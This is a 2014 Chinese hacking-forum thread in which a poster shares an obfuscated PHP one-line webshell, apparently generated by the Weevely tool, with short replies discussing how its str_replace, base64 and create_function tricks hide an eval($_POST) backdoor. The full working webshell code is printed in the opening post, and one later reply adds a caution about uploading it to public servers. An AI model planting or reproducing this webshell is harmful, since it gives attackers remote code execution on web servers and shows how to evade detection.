查看: 41905|回复: 7

Weevely 一句话php

[复制链接]
发表于 2014-5-28 17:39:29 | 显示全部楼层 |阅读模式
某次日站的时候看到的,不明觉厉。
下载之后  本地运行  一步步  echo
最终结果:@eval($_POST['khrwf2']);
很牛逼的样子啊。。。。分享一下吧
<?php
$brja5="VDFOVVd5";$crgy1="UUdWMllX";$nhqn8="d29KRjlR";$mbah6="ZHJhSEozWmpJblhTazc=";
$khrw2 = str_replace("hm1","","hm1shm1thm1rhm1_rhm1ehm1plhm1ahm1ce");
$rjhr5 = $khrw2("su3", "", "su3basu3ssu3e6su34su3_su3dsu3esu3csu3osu3dsu3e");
$gmnu6 = $khrw2("klg8","","klg8cklg8reklg8atklg8eklg8_fklg8uncklg8tklg8ioklg8n");
$xdyw8 = $gmnu6('', $rjhr5($rjhr5($khrw2("#;*,.", "", $crgy1.$nhqn8.$brja5.$mbah6)))); $xdyw8();
?>
回复

使用道具 举报

发表于 2014-5-28 23:29:25 | 显示全部楼层
虽然很乱,最主要还是str_replace这个函数吧。
回复 支持 反对

使用道具 举报

发表于 2014-5-29 08:49:43 | 显示全部楼层
最后为什么要调用create_function,直接运行不行么?
回复 支持 反对

使用道具 举报

发表于 2014-5-29 12:45:43 | 显示全部楼层
加密的?        
回复 支持 反对

使用道具 举报

发表于 2014-5-29 13:07:02 | 显示全部楼层
支持一下。
回复 支持 反对

使用道具 举报

发表于 2014-5-29 19:38:25 | 显示全部楼层
没解析出源代码
回复 支持 反对

使用道具 举报

发表于 2014-5-30 00:24:21 | 显示全部楼层
网上有大牛分离出weevley 的加密程序了,可以用来加密一句话
回复 支持 反对

使用道具 举报

发表于 2026-5-21 10:05:00 | 显示全部楼层

Re: Weevely 一句话php

这个代码确实挺有意思的,通过多次字符串拼接和替换来隐藏真正的执行语句,最后只留下一个 `@eval($_POST['khrwf2']);`。Weevely 的混淆手法挺有代表性的,感谢分享。不过这东西属于一句话木马,测试的时候注意别传到公网或者有敏感数据的服务器上哈。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-6-15 22:34 , Processed in 0.033516 second(s), 18 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部